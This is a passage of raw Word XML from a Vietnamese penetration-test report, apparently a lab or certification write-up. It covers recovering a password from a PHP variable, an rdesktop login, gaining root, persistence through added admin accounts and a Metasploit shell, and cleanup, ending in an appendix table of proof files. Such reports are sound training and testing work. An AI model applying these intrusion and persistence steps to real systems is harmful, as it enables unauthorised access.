        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6FFBCEA1" wp14:editId="1B170519">
            <wp:extent cx="5943600" cy="4983480"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="17" name="Picture 17" descr="A picture containing text, bottle, screensho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00A2AD66" w14:textId="55802DC4" w:rsidR="27B66015" w:rsidRDefault="4ABB20AF" w:rsidP="55568F1B">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="279768D5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">Xuất ra màn hình giá trị của biến $fO0 và </w:t>
      </w:r>
      <w:r w:rsidRPr="3D20B9FE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>phát hiện ra password:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E655859" w14:textId="23028D3D" w:rsidR="0A642C71" w:rsidRDefault="0A642C71" w:rsidP="589D3FA5">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C1B0DF3" wp14:editId="50529C3A">
            <wp:extent cx="6010275" cy="914062"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2144277388" name="Picture 214427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10275" cy="914062"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="52763006" w14:textId="1E2D6521" w:rsidR="00950341" w:rsidRDefault="5AA38A55" w:rsidP="039128E1">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="039128E1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve">Sau khi có được pass, ta tiến hành remote tới bằng lệnh </w:t>
      </w:r>
      <w:r w:rsidR="00400C59">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00950341" w:rsidRPr="00950341">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>rdesktop -u john 192.168.19.116</w:t>
      </w:r>
      <w:r w:rsidR="00950341">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224CDCB6" w14:textId="05F1EC94" w:rsidR="00AE1FD0" w:rsidRDefault="00050194" w:rsidP="00A30205">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63724192" wp14:editId="61BF9058">
            <wp:extent cx="6057900" cy="1554480"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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6057900" cy="1554480"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2326ACE1" w14:textId="1E0E367B" w:rsidR="00400C59" w:rsidRDefault="00400C59" w:rsidP="039128E1">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Tiếp tục đăng nhập</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E8DF11" w14:textId="69055CF7" w:rsidR="00400C59" w:rsidRDefault="00400C59" w:rsidP="039128E1">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00400C59">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DCC710F" wp14:editId="624A6E73">
            <wp:extent cx="5943600" cy="389064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50"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3890645"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6D4FAB" w14:textId="77777777" w:rsidR="00A30205" w:rsidRDefault="00A30205">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2106D958" w14:textId="2D0D972C" w:rsidR="002B4351" w:rsidRDefault="002B4351" w:rsidP="039128E1">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Đăng nhập thành công</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38584A69" w14:textId="30E8D973" w:rsidR="00AE1FD0" w:rsidRPr="00400C59" w:rsidRDefault="002B4351" w:rsidP="039128E1">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B4351">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6FEAD52F" wp14:editId="26621FE1">
            <wp:extent cx="5943600" cy="326136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1"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3261360"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B838407" w14:textId="77777777" w:rsidR="00B37A80" w:rsidRDefault="00B37A80" w:rsidP="00B37A80">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Hình ảnh minh chứng</w:t>
      </w:r>
      <w:r w:rsidRPr="00F043C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6CCCBF" w14:textId="77777777" w:rsidR="00B37A80" w:rsidRDefault="00B37A80" w:rsidP="00B37A80">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C366A5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t xml:space="preserve">[Hình ảnh chứa nội dung: tên user </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidRPr="00C366A5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t xml:space="preserve"> (whoami),</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t xml:space="preserve"> id,</w:t>
      </w:r>
      <w:r w:rsidRPr="00C366A5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t xml:space="preserve"> địa chỉ IP (ipconfig)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735A73D6" w14:textId="525590B5" w:rsidR="54227B9C" w:rsidRDefault="54227B9C" w:rsidP="039128E1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26343B91" wp14:editId="50340A6F">
            <wp:extent cx="4572000" cy="2895600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1481790594" name="Picture 14817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4BF78ACF" w14:textId="77777777" w:rsidR="00B37A80" w:rsidRDefault="00B37A80" w:rsidP="00B37A80">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Nội dung tập tin Proof.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00F043C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729515B7" w14:textId="77777777" w:rsidR="00B37A80" w:rsidRPr="00D40BBF" w:rsidRDefault="00B37A80" w:rsidP="00B37A80">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C366A5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t>[Hình ảnh chứa nội dung: địa chỉ IP (ipconfig)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t>, nội dung tập tin proof.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00C366A5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:bCs/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E9BFE2" w14:textId="626A9D7E" w:rsidR="009AF279" w:rsidRDefault="009AF279" w:rsidP="039128E1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A023E94" wp14:editId="05B5966E">
            <wp:extent cx="4572000" cy="2590800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="610107511" name="Picture 6101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3549D41" w14:textId="77777777" w:rsidR="00B37A80" w:rsidRDefault="00B37A80" w:rsidP="00E06EDA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36F24FA0" w14:textId="187B756D" w:rsidR="004D636B" w:rsidRPr="00D05018" w:rsidRDefault="001D1129" w:rsidP="00E06EDA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="004D636B" w:rsidRPr="00D05018">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00D53F0C" w:rsidRPr="00D05018">
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="004D636B" w:rsidRPr="00D05018">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Duy trì quyền truy cập</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="6563E6D6" w14:textId="347CAB5D" w:rsidR="00F80604" w:rsidRPr="00F043C0" w:rsidRDefault="00294770" w:rsidP="00951D4C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Sau khi kiểm soát được các máy chủ, chúng tôi vẫn duy trì được phiên truy cập của mình, nhằm đảm bảo rằng chúng tôi vẫn có thể truy cập lại vào máy chủ bất kỳ lúc nào. Nhiều lỗ hổng chỉ có thể được khai thác một lần duy nhất, vì vậy việc duy trì phiên truy cập vào máy chủ là hết sức cần thiết. </w:t>
      </w:r>
      <w:r w:rsidR="00A30205" w:rsidRPr="008F34C9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>3Musketeers</w:t>
      </w:r>
      <w:r w:rsidR="00A30205" w:rsidRPr="00F043C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">đã thêm vào các tài khoản có quyền cao nhất (thuộc các group administrators hoặc sudo) trên các máy chủ mà chúng tôi đã kiểm soát. Ngoài quyền truy cập cao nhất, một shell Metasploit đã được cài đặt trên máy nhằm đảm bảo rằng các quyền truy cập bổ sung sẽ được thiết lập. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449B89C4" w14:textId="2CB7FF61" w:rsidR="004D636B" w:rsidRPr="00D05018" w:rsidRDefault="00294770" w:rsidP="00E06EDA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc57241321"/>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="004D636B" w:rsidRPr="00D05018">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00D53F0C" w:rsidRPr="00D05018">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="004D636B" w:rsidRPr="00D05018">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009E48EB">
        <w:t>Xóa dấu vết</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="75A2B386" w14:textId="77777777" w:rsidR="004349D4" w:rsidRDefault="009E48EB" w:rsidP="00505021">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Giai đoạn xóa dấu vết nhằm đảm bảo rằng các dữ liệu/tài khoản được sinh ra trong quá trình kiểm thử xâm nhập được loại bỏ khỏi máy chủ. </w:t>
      </w:r>
      <w:r w:rsidRPr="009E48EB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Thông thường, các phần nhỏ của công cụ hoặc tài khoản người dùng được để lại trên máy tính của tổ chức, điều này có thể gây ra các vấn đề về bảo mật</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. Chúng ta cần phải đảm bảo rằng không để sót lại bất kỳ dấu vết </w:t>
      </w:r>
      <w:r w:rsidR="004349D4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">trong </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>quá trình kiểm thử xâm nhập</w:t>
      </w:r>
      <w:r w:rsidR="004349D4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273E5C3F" w14:textId="4C2F35B6" w:rsidR="004D636B" w:rsidRPr="00F043C0" w:rsidRDefault="004349D4" w:rsidP="00505021">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Sau khi có được các thông tin có giá trị trên máy chủ của đơn vị, </w:t>
      </w:r>
      <w:r w:rsidR="00A30205" w:rsidRPr="008F34C9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>3Musketeers</w:t>
      </w:r>
      <w:r w:rsidR="00A30205" w:rsidRPr="00F043C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>đã xóa tất cả tài khoản và mật khẩu người dùng cũng như các dịch vụ được tạo ra bởi Metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E65AF4F" w14:textId="1FE62857" w:rsidR="00C20F6E" w:rsidRPr="00D05018" w:rsidRDefault="00294770" w:rsidP="006156AE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc57241322"/>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00E617E1" w:rsidRPr="00D05018">
        <w:t xml:space="preserve">.0 </w:t>
      </w:r>
      <w:r>
        <w:t>Phụ lục</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="3E033C0C" w14:textId="36B204F0" w:rsidR="00E651D4" w:rsidRDefault="00294770" w:rsidP="00E06EDA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc57241323"/>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00CC3450" w:rsidRPr="00F043C0">
        <w:t xml:space="preserve">.1 </w:t>
      </w:r>
      <w:r>
        <w:t>Phụ lục</w:t>
      </w:r>
      <w:r w:rsidR="00CC3450" w:rsidRPr="00F043C0">
        <w:t xml:space="preserve"> 1 – </w:t>
      </w:r>
      <w:r>
        <w:t>Nội dung tập tin local.txt và proof.txt</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblBorders>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:insideH w:val="nil"/>
          <w:insideV w:val="nil"/>
        </w:tblBorders>
        <w:tblLook w:val="0600" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="775"/>
        <w:gridCol w:w="40"/>
        <w:gridCol w:w="3253"/>
        <w:gridCol w:w="107"/>
        <w:gridCol w:w="5175"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B11A8B" w14:paraId="71F00904" w14:textId="2F51AD7D" w:rsidTr="00E95C20">
        <w:trPr>
          <w:trHeight w:val="320"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1200" w:type="pct"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="3D85C6"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="40" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="40" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1D2363BD" w14:textId="06AFC510" w:rsidR="00B11A8B" w:rsidRPr="00B11A8B" w:rsidRDefault="00294770" w:rsidP="00B11A8B">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Địa chỉ IP</w:t>
            </w:r>
            <w:r w:rsidR="00B11A8B" w:rsidRPr="00B11A8B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Hostname)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1850" w:type="pct"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="3D85C6"/>
            <w:tcMar>
              <w:top w:w="40" w:type="dxa"/>
              <w:left w:w="40" w:type="dxa"/>
              <w:bottom w:w="40" w:type="dxa"/>
              <w:right w:w="40" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="71B61928" w14:textId="4285E775" w:rsidR="00B11A8B" w:rsidRPr="00B11A8B" w:rsidRDefault="00294770" w:rsidP="00B11A8B">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Nội dung l</w:t>
            </w:r>
            <w:r w:rsidR="00E06EDA">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>ocal</w:t>
            </w:r>
            <w:r w:rsidR="00B11A8B" w:rsidRPr="00B11A8B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1900" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="3D85C6"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6B7968C7" w14:textId="3E12CECE" w:rsidR="00B11A8B" w:rsidRPr="00B11A8B" w:rsidRDefault="00294770" w:rsidP="00B11A8B">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="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Nội dung proof.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E95C20" w14:paraId="330336E3" w14:textId="3BAE63EB" w:rsidTr="321E5494">
        <w:trPr>
          <w:trHeight w:val="420"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="120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D332B4E" w14:textId="2CD313DB" w:rsidR="00E95C20" w:rsidRPr="00970012" w:rsidRDefault="7C7D39DA" w:rsidP="00E95C20">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="321E5494">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>192.168.19.115</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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5F113AA2" w14:textId="00F434F3" w:rsidR="00E95C20" w:rsidRPr="00970012" w:rsidRDefault="5EF34536" w:rsidP="00E95C20">
            <w:pPr>
              <w:widowControl w:val="0"/>
